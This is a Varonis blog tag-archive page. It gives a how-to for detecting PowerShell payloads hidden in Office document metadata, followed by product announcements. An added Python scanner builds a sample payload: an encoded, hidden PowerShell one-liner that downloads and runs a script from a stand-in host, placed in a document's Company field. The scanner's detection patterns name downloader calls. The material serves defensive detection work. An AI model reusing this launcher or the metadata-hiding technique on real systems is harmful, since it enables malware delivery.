Tag Archives: DatAdvantage

Detecting Malware Payloads in Office Document Metadata

Office Documents with Malicious Metadata

Ever consider document properties like “Company,” “Title,” and “Comments” a vehicle for a malicious payload? Check out this nifty PowerShell payload in the Company metadata:

Here’s the full VirusTotal entry. The target opens the Office document and, with macros enabled, the macro reads the payload stored in the document’s own metadata and executes it. No extra files are written to disk and no network requests are made.

The question of whether DatAlert can detect something like this came up in the Twitter thread, so I decided to write up a quick how-to.

Finding Malicious Metadata with Varonis

What you’ll need: DatAdvantage, Data Classification Framework, DatAlert

Step 1: Add Extended File Properties to be scanned by Data Classification Framework.

  • Open up the Varonis Management Console
  • Click on Configuration → Extended File properties
  • Add a new property for whichever field you’d like to scan (e.g., “Company”)

Varonis Management Console

(Note: prior to version 6.3, extended properties are created in DatAdvantage under Tools → DCF and DW → Configuration → Advanced)

Step 2: Define a malicious metadata classification rule

  • In the main menu of DatAdvantage select Tools → DCF and DW → Configuration
  • Create a new rule
  • Create a new filter
  • Select File properties → Company (or whichever property you’re scanning)
  • Select “like” to search for a substring
  • Add the malicious value you’d like to look for (e.g., .exe, .bat, or powershell)

Varonis DCF New Classification Rule

Step 3: Create an alert in DatAlert to notify you whenever a file with malicious metadata is discovered

  • In the main menu of DatAdvantage select Tools → DatAlert
  • Click the green “+” button to create a new rule
  • Click on the “Where (Affected Object)” sub menu on the left
  • Add a new filter → Classification Results
  • Select your rule name (e.g., “Malicious Metadata”)
  • Select “Files with hits” and “Hit count (on selected rules)” greater than 0

DatAlert Rule for Malicious Document Metadata

You can fill out the rest of the details of your alert rule–like which systems to scan, how you want to get your alerts, etc.

As an extra precaution, you could also create a Data Transport Engine rule based on the same classification result that will automatically quarantine files that are found to have malicious metadata.

That’s it! You can update your “Malicious Metadata” rule over time as malware researchers report new and stealthier ways to encode malicious content within document metadata.
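To check the classification logic outside the product, here is an added example (my own code, not Varonis’s and not from the original post) that does in Python what the DCF rule above does in the console: read the Company, Title and Comments properties out of an OOXML document and run a substring-style match against them. It goes beyond the page in two ways: the “like” substrings are generalised to regular expressions, and a PowerShell -EncodedCommand argument found in a property is base64/UTF-16LE decoded and scanned as well, so a payload hidden behind -enc still trips the plaintext rules. The indicator list, the sample payload and the minimal .docx fixture are all constructed here for illustration.

```python
"""Scan OOXML Office documents for suspicious metadata (added example, not Varonis code)."""
import base64
import binascii
import io
import re
import zipfile
from xml.etree import ElementTree as ET
from xml.sax.saxutils import escape

# Where OOXML keeps the properties shown in File > Info: docProps/app.xml holds
# Company/Manager, docProps/core.xml holds Title/Subject/Keywords and
# Description (displayed as "Comments").
METADATA_PARTS = ("docProps/app.xml", "docProps/core.xml")

# Constructed indicator set. The page's examples are ".exe" and ".bat"; the
# rest cover the PowerShell-in-metadata shape the post describes.
INDICATORS = {
    "executable_ref": re.compile(r"\.(?:exe|bat|vbs|ps1)\b", re.I),
    "powershell": re.compile(r"\bpowershell(?:\.exe)?\b", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "downloader": re.compile(r"downloadstring|downloadfile|net\.webclient", re.I),
    "base64_decode": re.compile(r"frombase64string", re.I),
}
ENCODED_ARG = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)


def read_properties(docx_bytes: bytes) -> dict:
    """Return {property_name: text} from the metadata parts of an OOXML file."""
    props = {}
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for part in METADATA_PARTS:
            if part not in z.namelist():
                continue
            for el in ET.fromstring(z.read(part)).iter():
                name = el.tag.rsplit("}", 1)[-1]  # '{ns}Company' -> 'Company'
                if el.text and el.text.strip():
                    props[name] = el.text.strip()
    return props


def decode_encoded_command(value: str):
    """If a property carries 'powershell -enc <b64>', return the decoded script.

    -EncodedCommand is base64 of UTF-16LE text; anything that does not decode
    that way yields None rather than a guess.
    """
    m = ENCODED_ARG.search(value)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def classify(props: dict) -> list:
    """Apply the indicator rules; each (property, rule) pair is one 'hit'."""
    hits = []
    for name, value in props.items():
        texts = [(name, value)]
        decoded = decode_encoded_command(value)
        if decoded:  # scan the decoded script too, labelled separately
            texts.append((name + " (decoded)", decoded))
        for label, text in texts:
            for rule, rx in INDICATORS.items():
                if rx.search(text):
                    hits.append((label, rule))
    return hits


def build_sample_docx(company: str, comments: str) -> bytes:
    """Constructed fixture: only the zip parts that carry metadata (not a full Word file)."""
    app_xml = ('<?xml version="1.0" encoding="UTF-8"?><Properties xmlns='
               '"http://schemas.openxmlformats.org/officeDocument/2006/extended-properties">'
               f'<Application>Microsoft Office Word</Application>'
               f'<Company>{escape(company)}</Company></Properties>')
    core_xml = ('<?xml version="1.0" encoding="UTF-8"?><cp:coreProperties xmlns:cp='
                '"http://schemas.openxmlformats.org/package/2006/metadata/core-properties" '
                'xmlns:dc="http://purl.org/dc/elements/1.1/"><dc:title>Q3 invoice</dc:title>'
                f'<dc:description>{escape(comments)}</dc:description></cp:coreProperties>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("docProps/app.xml", app_xml)
        z.writestr("docProps/core.xml", core_xml)
    return buf.getvalue()


# Constructed payload in the Company property: an encoded one-liner, so a plain
# ".exe" rule on the raw property text would miss the downloader inside it.
SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')"
PAYLOAD = "powershell -nop -w hidden -enc " + base64.b64encode(SCRIPT.encode("utf-16-le")).decode()
SAMPLE_DOCX = build_sample_docx(company=PAYLOAD, comments="Reviewed by finance")


def scan(docx_bytes: bytes = SAMPLE_DOCX) -> list:
    """Hit list for one document; a DatAlert-style rule fires when it is non-empty."""
    return classify(read_properties(docx_bytes))


if __name__ == "__main__":
    for label, rule in scan():
        print(f"{label}: {rule}")
```

This covers OOXML (.docx/.xlsx/.pptx) only; legacy binary .doc/.xls files keep the same properties in OLE2 SummaryInformation streams and need a different reader. The decoded-script pass is the part worth carrying back into the product rule set: a rule that only matches on “.exe” will never see a payload that arrives base64-encoded, so match on the launcher (“powershell”, “-enc”) as well as on the payload.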

If you’re an existing Varonis customer, you can setup office hours with your assigned engineer to review your classification rules and alerts. Not yet a Varonis customer? What are you waiting for? Get a demo of our data security platform today.

Here’s Why Most Companies Are Easy Prey for Cyberattackers

Today we announced the results of anonymized data that our DatAdvantage and Data Classification Framework solutions collected throughout 2015 during risk assessments conducted for potential customers on a limited subset of their file systems. The results show a staggering level of exposure in corporate file systems, including an average of 9.9 million files per assessment that were accessible by every employee in the company.

Varonis DatAdvantage provides full visibility into who can and does access file systems and unstructured data. Varonis Data Classification Framework identifies sensitive and regulated content, like credit card numbers and health records, and maps them to exposures in their host file systems. Even while assessment and remediation projects are in progress, Varonis DatAlert can detect and stop insider threats, unwanted privilege escalations and abuse, and ransomware like Cryptolocker.

Of the insights gleaned from dozens of customer risk assessments conducted in mid-to-large enterprises prior to remediation, Varonis found the average company had, in a subset of its file systems:

  • 35.3 million files, stored in 4 million folders
  • 1 million folders, or an average of 28% of all folders, with “everyone” group permission enabled, i.e., open to all network users
  • 9 million files that were accessible by every employee in the company regardless of their roles
  • 8 million folders, or 70% of all folders, contained stale data — untouched for the past six months
  • 25,000 user accounts, 7,700 of them (31%) “stale,” i.e., not logged in for the past 60 days, suggesting former employees, or consultants and contractors whose engagements have ended

The ‘everyone’ group is a common convenience for permissions when originally set up. That mass access also makes it astonishingly easy for hackers to steal company data.

Some individual companies’ lowlights that were gleaned from the Varonis risk assessments:

  • In one company, every employee had access to 82% of the 6.1 million total folders.

  • Another company had more than 2 million files containing sensitive data (credit card, social security or account numbers) that everyone in the company could access.

  • 50% of another company’s folders had “everyone” group permission, and more than 14,000 files in those folders were found to contain sensitive data.

  • A single company had more than 146,000 stale users – accounts whose users had not logged in for the past 60 days. That’s nearly three times more users than the average FORTUNE 500 company has employees.

Although this data presents a bleak look at the average enterprise’s corporate file system environment, the organizations running these risk assessments are taking these challenges seriously. Most of them have since implemented Varonis, embracing a more holistic view of the data on their file and email systems and closing these gaping, often unseen security holes before the next major breach causes heavy damage. Our software is able to provide a granular look at where sensitive data lives, where it is over-exposed within an organization, who is accessing that data, and how to lock it down. While that remediation process is running, our ability to detect and stop many types of insider threats has been a major revelation for our customers.

***

Our Risk Assessments quickly show you where your most vulnerable data is stored, who is accessing it, and what needs to be done to secure it.

To request a Risk Assessment from the Varonis Professional Services Team, visit: https://info.varonis.com/assessment

Varonis DatAdvantage and DatAlert Are Now Interoperable with LogRhythm’s Security Intelligence Platform

Today we’re happy to announce the interoperability of our DatAdvantage and DatAlert solutions with the LogRhythm Security Intelligence Platform.

With the new interoperability, customers can combine critical security insight from LogRhythm with Varonis intelligence about file systems and unstructured data, the type of data they typically have the most of and know the least about. Varonis and LogRhythm can help organizations proactively spot signs of insider threats before they end up in the news because of a data breach.

How does it work?

Varonis can automatically send alerts from Varonis DatAdvantage and DatAlert into LogRhythm Security Intelligence Platform and thereby increase the speed and accuracy with which customers are able to identify, prioritize and investigate unusual user behavior surrounding unstructured data. Anomalous activity spotted by Varonis analytics includes unusual access to sensitive and stale data, mass deletions and modifications, malware and ransomware infections like CryptoLocker and Cryptowall, privilege escalations, unusual access to PII, multiple failed login attempts, and many more potential warning signs. Installation of Varonis DatAdvantage and DatAlert can take as little as an hour, and integration with LogRhythm is as simple as configuring an IP address.